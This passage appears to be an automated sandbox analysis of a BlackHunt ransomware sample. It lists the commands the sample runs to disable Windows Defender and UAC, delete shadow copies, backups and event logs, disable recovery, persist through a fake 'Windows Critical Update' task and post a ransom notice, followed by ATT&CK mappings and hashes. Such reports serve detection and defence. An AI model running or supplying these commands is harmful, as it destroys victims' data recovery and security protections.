cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 148 PID 2364 wrote to memory of 3256 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 148 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe"C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2364 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2536
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:5092
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1416
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4296
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1112
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵
- Modifies registry class
PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4288
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1508
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:60
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4128
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3312
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3212
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe" /F2⤵PID:1488
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe" /F3⤵
- Creates scheduled task(s)
PID:5820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:936
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4672
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5088
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4748
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2216
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4536
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2252
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2204
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1232
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4336
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:4048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2652
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5640
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:5864
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5360
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2316
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2812
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3324
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:728
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1564
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4996
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3628
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1260
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5620
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6036
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:5452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2500
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:5092
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:5448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:5844
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:5260
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:216
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5556
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:5336 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe"2⤵PID:2952
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3244
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:5092
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5268
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4684
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4660
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bf44ed54ef3990749d8c317c9213f430
SHA1cdb1ea0ff1d14e611ca98e64b19aeb2b08ecafac
SHA2562565d24959fd6e1a0cbf88d95fab7dbd53d4cef95fd7d64031546daafd2ed50c
SHA512d03328b31a4de92e979464578e9d74488fd811073fc09f70f997d4e4e0f9d11c550e284127701a61b10adaf87e9ee17fd85d98cfc6b8b04da7086811e0035150
-
Filesize
12KB
MD546dee8dc985820700fbaeef262bdd615
SHA1035c0e3cf5ce0c9a05decc05bb87ec61ad82dff4
SHA25648c62a569ff1fede3f4e5970f0566eb5df5888502fdaf6f9d08b566b9c318457
SHA512fb5546ce8881ed5682a3aedf381efb6c389d0d5912d115020f7f7224f1cdbb5dd510c87327538df26b288c3872e19d1bdb9c750fa5995245756d60ef27241608
-
Filesize
684B
MD5bd75a4c9822c85260d6d9ba2420c68b6
SHA1fe3c389d20400e44ccb3940c15803c70328eb5a0
SHA256102769e1b175e5f15e65c6ef7647388e12a3ade90d95e1134492da70e715b32e
SHA51278ceb7b574b5f60a48fb4b9c5f2827e3dfe39e56fd6e7d768568f5a1eccb033f9fbbd71f7fce87dc65b079b5b83246ecfeb55c86f9ca07148a34fa157137a8d8